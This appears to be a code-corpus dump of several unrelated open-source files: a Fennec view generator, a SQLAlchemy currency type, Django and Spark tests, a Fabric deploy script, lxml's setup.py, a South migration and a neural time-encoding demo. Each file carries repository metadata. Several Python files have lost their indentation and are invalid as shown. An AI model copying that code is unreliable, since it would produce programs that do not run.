mkodekar/Fennece-Browser | base/widget/themed/generate_themed_views.py | 1 | 2374 | #!/bin/python
# -*- Mode: python; c-basic-offset: 4; indent-tabs-mode: nil; tab-width: 40 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
'''
Script to generate Themed*.java source files for Fennec.
This script runs the preprocessor on an input template and writes
updated files into the source directory.
To update the themed views, update the input template
(ThemedView.java.frag) and run the script. Use version control to
examine the differences, and don't forget to commit the changes to the
template and the outputs.
'''
from __future__ import (
print_function,
unicode_literals,
)
import os
from mozbuild.preprocessor import Preprocessor
__DIR__ = os.path.dirname(os.path.abspath(__file__))
template = os.path.join(__DIR__, 'ThemedView.java.frag')
dest_format_string = 'Themed%(VIEW_NAME_SUFFIX)s.java'
views = [
dict(VIEW_NAME_SUFFIX='EditText',
BASE_TYPE='android.widget.EditText',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='FrameLayout',
BASE_TYPE='android.widget.FrameLayout',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='ImageButton',
BASE_TYPE='android.widget.ImageButton',
STYLE_CONSTRUCTOR=1,
TINT_FOREGROUND_DRAWABLE=1),
dict(VIEW_NAME_SUFFIX='ImageView',
BASE_TYPE='android.widget.ImageView',
STYLE_CONSTRUCTOR=1,
TINT_FOREGROUND_DRAWABLE=1),
dict(VIEW_NAME_SUFFIX='LinearLayout',
BASE_TYPE='android.widget.LinearLayout'),
dict(VIEW_NAME_SUFFIX='RelativeLayout',
BASE_TYPE='android.widget.RelativeLayout',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='TextSwitcher',
BASE_TYPE='android.widget.TextSwitcher'),
dict(VIEW_NAME_SUFFIX='TextView',
BASE_TYPE='android.widget.TextView',
STYLE_CONSTRUCTOR=1),
dict(VIEW_NAME_SUFFIX='View',
BASE_TYPE='android.view.View',
STYLE_CONSTRUCTOR=1),
]
for view in views:
pp = Preprocessor(defines=view, marker='//#')
dest = os.path.join(__DIR__, dest_format_string % view)
with open(template, 'rU') as input:
with open(dest, 'wt') as output:
pp.processFile(input=input, output=output)
print('%s' % dest)
| mpl-2.0 | -6,609,594,954,600,994,000 | 32.43662 | 79 | 0.669756 | false |
cheungpat/sqlalchemy-utils | sqlalchemy_utils/types/currency.py | 1 | 2037 | babel = None
try:
import babel
except ImportError:
pass
import six
from sqlalchemy import types
from sqlalchemy_utils import ImproperlyConfigured
from sqlalchemy_utils.primitives import Currency
from .scalar_coercible import ScalarCoercible
class CurrencyType(types.TypeDecorator, ScalarCoercible):
"""
Changes :class:`.Currency` objects to a string representation on the way in
and changes them back to :class:`.Currency` objects on the way out.
In order to use CurrencyType you need to install Babel_ first.
.. _Babel: http://babel.pocoo.org/
::
from sqlalchemy_utils import CurrencyType, Currency
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True)
name = sa.Column(sa.Unicode(255))
currency = sa.Column(CurrencyType)
user = User()
user.currency = Currency('USD')
session.add(user)
session.commit()
user.currency # Currency('USD')
user.currency.name # US Dollar
str(user.currency) # US Dollar
user.currency.symbol # $
CurrencyType is scalar coercible::
        user.currency = 'USD'
        user.currency  # Currency('USD')
"""
impl = types.String(3)
python_type = Currency
def __init__(self, *args, **kwargs):
if babel is None:
raise ImproperlyConfigured(
"'babel' package is required in order to use CurrencyType."
)
super(CurrencyType, self).__init__(*args, **kwargs)
def process_bind_param(self, value, dialect):
if isinstance(value, Currency):
return value.code
elif isinstance(value, six.string_types):
return value
def process_result_value(self, value, dialect):
if value is not None:
return Currency(value)
def _coerce(self, value):
if value is not None and not isinstance(value, Currency):
return Currency(value)
return value
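

# Illustrative only (not part of sqlalchemy_utils): a tiny standalone check of the
# scalar coercion defined above. It needs Babel installed, since CurrencyType()
# refuses to instantiate without it; no database connection is involved.
if __name__ == '__main__':
    ct = CurrencyType()
    assert ct.process_bind_param(Currency('USD'), dialect=None) == 'USD'
    assert ct._coerce('USD') == Currency('USD')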
| bsd-3-clause | -8,878,608,680,686,917,000 | 24.4625 | 79 | 0.621993 | false |
Instawork/django-rest-framework-json-api | example/tests/integration/test_pagination.py | 1 | 2115 | from django.core.urlresolvers import reverse
import pytest
from example.tests.utils import dump_json, redump_json
pytestmark = pytest.mark.django_db
def test_pagination_with_single_entry(single_entry, client):
expected = {
"data": [
{
"type": "posts",
"id": "1",
"attributes":
{
"headline": single_entry.headline,
"bodyText": single_entry.body_text,
"pubDate": None,
"modDate": None
},
"meta": {
"bodyFormat": "text"
},
"relationships":
{
"blog": {
"data": {"type": "blogs", "id": "1"}
},
"authors": {
"meta": {"count": 1},
"data": [{"type": "authors", "id": "1"}]
},
"comments": {
"meta": {"count": 1},
"data": [{"type": "comments", "id": "1"}]
},
"suggested": {
"data": [],
"links": {
"related": "http://testserver/entries/1/suggested/",
"self": "http://testserver/entries/1/relationships/suggested"
}
}
}
}],
"links": {
"first": "http://testserver/entries?page=1",
"last": "http://testserver/entries?page=1",
"next": None,
"prev": None,
},
"meta":
{
"pagination":
{
"page": 1,
"pages": 1,
"count": 1
}
}
}
response = client.get(reverse("entry-list"))
content_dump = redump_json(response.content)
expected_dump = dump_json(expected)
assert content_dump == expected_dump
| bsd-2-clause | -7,632,098,763,866,832,000 | 29.652174 | 89 | 0.354137 | false |
pycarolinas/pycarolinas_org | fabfile.py | 1 | 1362 | import os
import re
import datetime
import string
import json
from fabric.contrib.project import rsync_project
from fabric.contrib.files import upload_template
from fabric.api import local, run, sudo
from fabric.state import env
from fabric.context_managers import cd
dev_conf = json.load(open('dev_conf.json'))
env.hosts = ['pycarolinas.org']
env.user = dev_conf['user']
env.project_dir = '/home/pycar/pycarolinas_org'
def clean():
local('find . -name "*.swp" -delete')
def build():
local('lessc pycarolinas_org/static/site.less pycarolinas_org/static/site.css')
def deploy(delete=True):
build()
rsync_project(local_dir='pycarolinas_org', remote_dir='/home/pycar/pycarolinas_org/')
collectstatic()
restart_django()
def nginx_update():
local('scp conf/pycarolinas-org.conf %[email protected]:/etc/nginx/sites-available/' % (env.user,))
sudo('service nginx restart')
def collectstatic():
run('env/bin/python pycarolinas_org/manage.py collectstatic -l --noinput --settings=pycarolinas_org.settings.local')
def stop_django():
run('kill `cat /home/pycar/django-fcgi.pid`')
def start_django():
run('env/bin/python pycarolinas_org/manage.py runfcgi host=127.0.0.1 port=8080 pidfile=/home/pycar/django-fcgi.pid --settings=pycarolinas_org.settings.local')
def restart_django():
stop_django()
start_django()
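

# Hypothetical helper (not in the original fabfile): writes a minimal
# dev_conf.json containing the only key read above ("user"); the username is a
# placeholder, not a real account.
def write_example_dev_conf(path='dev_conf.json', user='deploy'):
    with open(path, 'w') as fh:
        json.dump({'user': user}, fh)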
| mit | -4,509,938,444,805,112,300 | 28.608696 | 162 | 0.727606 | false |
ioram7/keystone-federado-pgid2013 | build/lxml/setup.py | 1 | 7602 | import os
import re
import sys
import fnmatch
# for command line options and supported environment variables, please
# see the end of 'setupinfo.py'
try:
import Cython
# may need to work around setuptools bug by providing a fake Pyrex
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "fake_pyrex"))
except ImportError:
pass
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
import versioninfo
import setupinfo
# override these and pass --static for a static build. See
# doc/build.txt for more information. If you do not pass --static
# changing this will have no effect.
STATIC_INCLUDE_DIRS = []
STATIC_LIBRARY_DIRS = []
STATIC_CFLAGS = []
STATIC_BINARIES = []
# create lxml-version.h file
svn_version = versioninfo.svn_version()
versioninfo.create_version_h(svn_version)
print("Building lxml version %s." % svn_version)
OPTION_RUN_TESTS = setupinfo.has_option('run-tests')
branch_link = """
After an official release of a new stable series, bug fixes may become
available at
https://github.com/lxml/lxml/tree/lxml-%(branch_version)s .
Running ``easy_install lxml==%(branch_version)sbugfix`` will install
the unreleased branch state from
https://github.com/lxml/lxml/tarball/lxml-%(branch_version)s#egg=lxml-%(branch_version)sbugfix
as soon as a maintenance branch has been established. Note that this
requires Cython to be installed at an appropriate version for the build.
"""
if versioninfo.is_pre_release():
branch_link = ""
extra_options = {}
if 'setuptools' in sys.modules:
extra_options['zip_safe'] = False
extra_options.update(setupinfo.extra_setup_args())
extra_options['package_data'] = {
'lxml': [
'lxml.etree.h',
'lxml.etree_api.h',
],
'lxml.includes': [
'*.pxd', '*.h'
],
'lxml.isoschematron': [
'resources/rng/iso-schematron.rng',
'resources/xsl/*.xsl',
'resources/xsl/iso-schematron-xslt1/*.xsl',
'resources/xsl/iso-schematron-xslt1/readme.txt'
],
}
extra_options['package_dir'] = {
'': 'src'
}
extra_options['packages'] = [
'lxml', 'lxml.includes', 'lxml.html', 'lxml.isoschematron'
]
def setup_extra_options():
is_interesting_package = re.compile('^(libxml|libxslt|libexslt)$').match
def extract_files(directories, pattern='*'):
def get_files(root, dir_path, files):
return [ (root, dir_path, filename)
for filename in fnmatch.filter(files, pattern) ]
file_list = []
for dir_path in directories:
dir_path = os.path.realpath(dir_path)
for root, dirs, files in os.walk(dir_path):
rel_dir = root[len(dir_path)+1:]
if is_interesting_package(rel_dir):
file_list.extend(get_files(root, rel_dir, files))
return file_list
def build_packages(files):
packages = {}
seen = set()
for root_path, rel_path, filename in files:
if filename in seen:
# libxml2/libxslt header filenames are unique
continue
seen.add(filename)
package_path = '.'.join(rel_path.split(os.sep))
if package_path in packages:
root, package_files = packages[package_path]
if root != root_path:
print("conflicting directories found for include package '%s': %s and %s"
% (package_path, root_path, root))
continue
else:
package_files = []
packages[package_path] = (root_path, package_files)
package_files.append(filename)
return packages
# Copy Global Extra Options
extra_opts = dict(extra_options)
# Build ext modules
ext_modules = setupinfo.ext_modules(
STATIC_INCLUDE_DIRS, STATIC_LIBRARY_DIRS,
STATIC_CFLAGS, STATIC_BINARIES)
extra_opts['ext_modules'] = ext_modules
packages = extra_opts.get('packages', list())
package_dir = extra_opts.get('package_dir', dict())
package_data = extra_opts.get('package_data', dict())
# Add lxml.include with (lxml, libxslt headers...)
# python setup.py build --static --static-deps install
# python setup.py bdist_wininst --static
if setupinfo.OPTION_STATIC:
include_dirs = [] # keep them in order
for extension in ext_modules:
for inc_dir in extension.include_dirs:
if inc_dir not in include_dirs:
include_dirs.append(inc_dir)
header_packages = build_packages(extract_files(include_dirs))
for package_path, (root_path, filenames) in header_packages.items():
if package_path:
package = 'lxml.includes.' + package_path
packages.append(package)
else:
package = 'lxml.includes'
package_data[package] = filenames
package_dir[package] = root_path
return extra_opts
setup(
name = "lxml",
version = versioninfo.version(),
author="lxml dev team",
author_email="[email protected]",
maintainer="lxml dev team",
maintainer_email="[email protected]",
url="http://lxml.de/",
download_url="http://pypi.python.org/packages/source/l/lxml/lxml-%s.tar.gz" % versioninfo.version(),
bugtrack_url="https://bugs.launchpad.net/lxml",
description="Powerful and Pythonic XML processing library combining libxml2/libxslt with the ElementTree API.",
long_description=((("""\
lxml is a Pythonic, mature binding for the libxml2 and libxslt libraries. It
provides safe and convenient access to these libraries using the ElementTree
API.
It extends the ElementTree API significantly to offer support for XPath,
RelaxNG, XML Schema, XSLT, C14N and much more.
To contact the project, go to the `project home page
<http://lxml.de/>`_ or see our bug tracker at
https://launchpad.net/lxml
In case you want to use the current in-development version of lxml,
you can get it from the github repository at
https://github.com/lxml/lxml . Note that this requires Cython to
build the sources, see the build instructions on the project home
page. To the same end, running ``easy_install lxml==dev`` will
install lxml from
https://github.com/lxml/lxml/tarball/master#egg=lxml-dev if you have
an appropriate version of Cython installed.
""" + branch_link) % { "branch_version" : versioninfo.branch_version() }) +
versioninfo.changes()),
classifiers = [
versioninfo.dev_status(),
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: BSD License',
'Programming Language :: Cython',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.4',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: C',
'Operating System :: OS Independent',
'Topic :: Text Processing :: Markup :: HTML',
'Topic :: Text Processing :: Markup :: XML',
'Topic :: Software Development :: Libraries :: Python Modules'
],
**setup_extra_options()
)
if OPTION_RUN_TESTS:
print("Running tests.")
import test
sys.exit( test.main(sys.argv[:1]) )
| apache-2.0 | 6,812,969,616,549,763,000 | 32.9375 | 115 | 0.638253 | false |
Plasmatium/google-python-exercises | basic/solution/mimic.py | 1 | 2998 | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
"""Mimic pyquick exercise -- optional extra exercise.
Google's Python Class
Read in the file specified on the command line.
Do a simple split() on whitespace to obtain all the words in the file.
Rather than read the file line by line, it's easier to read
it into one giant string and split it once.
Build a "mimic" dict that maps each word that appears in the file
to a list of all the words that immediately follow that word in the file.
The list of words can be in any order and should include
duplicates. So for example the key "and" might have the list
["then", "best", "then", "after", ...] listing
all the words which came after "and" in the text.
We'll say that the empty string is what comes before
the first word in the file.
With the mimic dict, it's fairly easy to emit random
text that mimics the original. Print a word, then look
up what words might come next and pick one at random as
the next word.
Use the empty string as the first word to prime things.
If we ever get stuck with a word that is not in the dict,
go back to the empty string to keep things moving.
Note: the standard python module 'random' includes a
random.choice(list) method which picks a random element
from a non-empty list.
For fun, feed your program to itself as input.
Could work on getting it to put in linebreaks around 70
columns, so the output looks better.
"""
import random
import sys
def mimic_dict(filename):
"""Returns mimic dict mapping each word to list of words which follow it."""
# +++your code here+++
# LAB(begin solution)
mimic_dict = {}
f = open(filename, 'r')
text = f.read()
f.close()
words = text.split()
prev = ''
for word in words:
if not prev in mimic_dict:
mimic_dict[prev] = [word]
else:
mimic_dict[prev].append(word)
# Could write as: mimic_dict[prev] = mimic_dict.get(prev, []) + [word]
# It's one line, but not totally satisfying.
prev = word
return mimic_dict
# LAB(replace solution)
# return
# LAB(end solution)
def print_mimic(mimic_dict, word):
"""Given mimic dict and start word, prints 200 random words."""
# +++your code here+++
# LAB(begin solution)
for unused_i in range(200):
print (word)
nexts = mimic_dict.get(word) # Returns None if not found
if not nexts:
nexts = mimic_dict[''] # Fallback to '' if not found
word = random.choice(nexts)
# The 'unused_' prefix turns off the lint warning about the unused variable.
# LAB(replace solution)
# return
# LAB(end solution)
# Provided main(), calls mimic_dict() and mimic()
def main():
if len(sys.argv) != 2:
print ('usage: ./mimic.py file-to-read')
sys.exit(1)
dict = mimic_dict(sys.argv[1])
print_mimic(dict, '')
if __name__ == '__main__':
main()
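

# Worked example (added for illustration, not part of the exercise solution):
# for the text "a b a c a b" the algorithm in mimic_dict() produces
# {'': ['a'], 'a': ['b', 'c', 'b'], 'b': ['a'], 'c': ['a']}.
def _tiny_mimic_demo():
  words = 'a b a c a b'.split()
  d = {}
  prev = ''
  for word in words:
    d.setdefault(prev, []).append(word)
    prev = word
  return d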
| apache-2.0 | 8,982,271,780,434,043,000 | 29.282828 | 78 | 0.693796 | false |
jmwenda/hypermap | hypermap/aggregator/tests/test_warper.py | 1 | 1877 | # -*- coding: utf-8 -*-
"""
Tests for the WMS Service Type.
"""
import unittest
from httmock import with_httmock
import mocks.warper
from aggregator.models import Service
class TestWarper(unittest.TestCase):
@with_httmock(mocks.warper.resource_get)
def test_create_wms_service(self):
# create the service
service = Service(
type='WARPER',
url='http://warper.example.com/warper/maps',
)
service.save()
# check layer number
self.assertEqual(service.layer_set.all().count(), 15)
# check layer 0 (public)
layer_0 = service.layer_set.all()[0]
self.assertEqual(layer_0.name, '29568')
self.assertEqual(layer_0.title, 'Plate 24: Map bounded by Myrtle Avenue')
self.assertTrue(layer_0.is_public)
self.assertEqual(layer_0.keywords.all().count(), 0)
self.assertEqual(layer_0.srs.all().count(), 3)
self.assertEqual(layer_0.check_set.all().count(), 1)
self.assertEqual(layer_0.layerdate_set.all()[0].date, '1855-01-01')
# a layer with no bbox must be stored with None coordinates
layer_no_bbox = service.layer_set.get(name='16239')
self.assertEqual(layer_no_bbox.bbox_x0, None)
self.assertEqual(layer_no_bbox.bbox_y0, None)
self.assertEqual(layer_no_bbox.bbox_x1, None)
self.assertEqual(layer_no_bbox.bbox_y1, None)
# test that if creating the service and is already exiting it is not being duplicated
# create the service
def create_duplicated_service():
duplicated_service = Service(
type='WARPER',
url='http://warper.example.com/warper/maps',
)
duplicated_service.save()
self.assertRaises(Exception, create_duplicated_service)
if __name__ == '__main__':
unittest.main()
| mit | -4,989,812,792,306,742,000 | 31.362069 | 93 | 0.623868 | false |
marvin-ai/marvin-python-toolbox | tests/common/test_data_source_provider.py | 1 | 2519 | #!/usr/bin/env python
# coding=utf-8
# Copyright [2017] [B2W Digital]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import findspark
findspark.init()
# is important to import these classes after findspark.init call
from pyspark.tests import ReusedPySparkTestCase
from marvin_python_toolbox.common.data_source_provider import get_spark_session
try:
import mock
except ImportError:
import unittest.mock as mock
class TestDataSourceProvider:
@mock.patch("pyspark.sql.SparkSession")
def test_get_spark_session(self, mocked_session):
spark = get_spark_session()
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('marvin-engine'),
mock.call.builder.appName().getOrCreate()]
)
spark = get_spark_session(app_name='TestEngine')
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('TestEngine'),
mock.call.builder.appName().getOrCreate()]
)
spark = get_spark_session(configs=[("spark.xxx", "true")])
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('TestEngine'),
mock.call.builder.appName().getOrCreate()]
)
@mock.patch("pyspark.sql.SparkSession")
def test_get_spark_session_with_hive(self, mocked_session):
spark = get_spark_session(enable_hive=True)
assert spark
mocked_session.assert_has_calls([
mock.call.builder.appName('marvin-engine'),
mock.call.builder.appName().enableHiveSupport(),
mock.call.builder.appName().enableHiveSupport().getOrCreate()]
)
class TestSparkDataSource(ReusedPySparkTestCase):
def test_spark_initialization(self):
rdd = self.sc.parallelize(['Hi there', 'Hi'])
counted = rdd.flatMap(lambda word: word.split(' ')).map(lambda word: (word, 1)).reduceByKey(lambda acc, n: acc + n)
assert counted.collectAsMap() == {'Hi': 2, 'there': 1}
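

# A minimal sketch (an assumption, not the library's actual code) of the
# get_spark_session() provider exercised above, matching the builder calls the
# mocked assertions expect: appName(), optional config() pairs, optional
# enableHiveSupport(), then getOrCreate().
def get_spark_session_sketch(app_name='marvin-engine', configs=None, enable_hive=False):
    from pyspark.sql import SparkSession
    builder = SparkSession.builder.appName(app_name)
    for key, value in (configs or []):
        builder = builder.config(key, value)
    if enable_hive:
        builder = builder.enableHiveSupport()
    return builder.getOrCreate()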
| apache-2.0 | -8,286,194,955,248,077,000 | 34.478873 | 123 | 0.676459 | false |
mingot/detectme_server | detectme/detectors/migrations/0003_auto__add_field_detector_training_log.py | 1 | 8577 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Detector.training_log'
db.add_column(u'detectors_detector', 'training_log',
self.gf('django.db.models.fields.TextField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Detector.training_log'
db.delete_column(u'detectors_detector', 'training_log')
models = {
u'accounts.detectmeprofile': {
'Meta': {'object_name': 'DetectMeProfile'},
'favourite_snack': ('django.db.models.fields.CharField', [], {'max_length': '5'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'my_profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'detectors.annotatedimage': {
'Meta': {'object_name': 'AnnotatedImage'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.DetectMeProfile']"}),
'box_height': ('django.db.models.fields.FloatField', [], {}),
'box_width': ('django.db.models.fields.FloatField', [], {}),
'box_x': ('django.db.models.fields.FloatField', [], {}),
'box_y': ('django.db.models.fields.FloatField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'detector': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['detectors.Detector']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_height': ('django.db.models.fields.PositiveSmallIntegerField', [], {'blank': 'True'}),
'image_jpeg': ('django.db.models.fields.files.ImageField', [], {'default': "'average_image/default.jpg'", 'max_length': '100'}),
'image_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'blank': 'True'}),
'location_latitude': ('django.db.models.fields.FloatField', [], {}),
'location_longitude': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionW': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionX': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionY': ('django.db.models.fields.FloatField', [], {}),
'motion_quaternionZ': ('django.db.models.fields.FloatField', [], {}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'detectors.detector': {
'Meta': {'ordering': "('created_at',)", 'object_name': 'Detector'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.DetectMeProfile']"}),
'average_image': ('django.db.models.fields.files.ImageField', [], {'default': "'defaults/default.png'", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'hash_value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['detectors.Detector']", 'null': 'True', 'blank': 'True'}),
'sizes': ('django.db.models.fields.TextField', [], {}),
'support_vectors': ('django.db.models.fields.TextField', [], {}),
'target_class': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'training_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'weights': ('django.db.models.fields.TextField', [], {})
},
u'detectors.rating': {
'Meta': {'object_name': 'Rating'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.DetectMeProfile']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'detector': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['detectors.Detector']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'rating': ('django.db.models.fields.PositiveSmallIntegerField', [], {})
}
}
complete_apps = ['detectors'] | mit | 324,546,438,016,698,240 | 72.316239 | 187 | 0.558237 | false |
bionet/ted.python | demos/iaf_delay_demo.py | 1 | 3443 | #!/usr/bin/env python
"""
Demos of MIMO time encoding and decoding algorithms that use IAF
neurons with delays.
"""
# Copyright (c) 2009-2015, Lev Givon
# All rights reserved.
# Distributed under the terms of the BSD license:
# http://www.opensource.org/licenses/bsd-license
import numpy as np
# Set matplotlib backend so that plots can be generated without a
# display:
import matplotlib
matplotlib.use('AGG')
from bionet.utils.misc import func_timer
import bionet.utils.band_limited as bl
import bionet.utils.plotting as pl
import bionet.ted.iaf as iaf
# For determining output plot file names:
output_name = 'iaf_delay_demo_'
output_count = 0
output_ext = '.png'
# Define input signal generation parameters:
T = 0.05
dur = 2*T
dt = 1e-6
f = 100
bw = 2*np.pi*f
np.random.seed(0)
noise_power = None
comps = 8
if noise_power == None:
fig_title = 'IAF Input Signal with No Noise'
else:
fig_title = 'IAF Input Signal with %d dB of Noise' % noise_power
M = 3 # number of input signals
N = 9 # number of neurons
# Starting and ending points of interval that is encoded:
t_start = 0.02
t_end = t_start+T
if t_end > dur:
raise ValueError('t_start is too large')
k_start = int(np.round(t_start/dt))
k_end = int(np.round(t_end/dt))
t_enc = np.arange(k_start, k_end, dtype=np.float)*dt
u_list = []
for i in xrange(M):
fig_title_in = fig_title + ' (Signal #' + str(i+1) + ')'
print fig_title_in
u = func_timer(bl.gen_band_limited)(dur, dt, f, noise_power, comps)
u /= max(u)
u *= 1.5
pl.plot_signal(t_enc, u[k_start:k_end], fig_title_in,
output_name + str(output_count) + output_ext)
u_list.append(u)
output_count += 1
t = np.arange(len(u_list[0]), dtype=np.float)*dt
# Define neuron parameters:
def randu(a, b, *d):
"""Create an array of the given shape and propagate it with random
samples from a uniform distribution over ``[a, b)``."""
if a >= b:
raise ValueError('b must exceed a')
return a+(b-a)*np.random.rand(*d)
b_list = list(randu(2.3, 3.3, N))
d_list = list(randu(0.15, 0.25, N))
k_list = list(0.01*np.ones(N))
a_list = map(list, np.reshape(np.random.exponential(0.003, N*M), (N, M)))
w_list = map(list, np.reshape(randu(0.5, 1.0, N*M), (N, M)))
fig_title = 'Signal Encoded Using Delayed IAF Encoder'
print fig_title
s_list = func_timer(iaf.iaf_encode_delay)(u_list, t_start, dt, b_list, d_list,
k_list, a_list, w_list)
for i in xrange(M):
for j in xrange(N):
fig_title_out = fig_title + '\n(Signal #' + str(i+1) + \
', Neuron #' + str(j+1) + ')'
pl.plot_encoded(t_enc, u_list[i][k_start:k_end],
s_list[j][np.cumsum(s_list[j])<T],
fig_title_out,
output_name + str(output_count) + output_ext)
output_count += 1
fig_title = 'Signal Decoded Using Delayed IAF Decoder'
print fig_title
u_rec_list = func_timer(iaf.iaf_decode_delay)(s_list, T, dt,
b_list, d_list, k_list,
a_list, w_list)
for i in xrange(M):
fig_title_out = fig_title + ' (Signal #' + str(i+1) + ')'
pl.plot_compare(t_enc, u_list[i][k_start:k_end],
u_rec_list[i][0:k_end-k_start], fig_title_out,
output_name + str(output_count) + output_ext)
output_count += 1
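

# Optional check (added here as an illustration, not part of the original demo):
# report a simple reconstruction SNR in dB for each decoded signal over the
# encoded interval.
def recon_snr_db(u, u_rec):
    err = u - u_rec
    return 10*np.log10(np.sum(u**2)/np.sum(err**2))

for i in xrange(M):
    snr = recon_snr_db(u_list[i][k_start:k_end], u_rec_list[i][0:k_end-k_start])
    print 'SNR of decoded signal #%d: %.2f dB' % (i+1, snr)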
| bsd-3-clause | 3,058,591,314,712,588,300 | 29.469027 | 78 | 0.600349 | false |
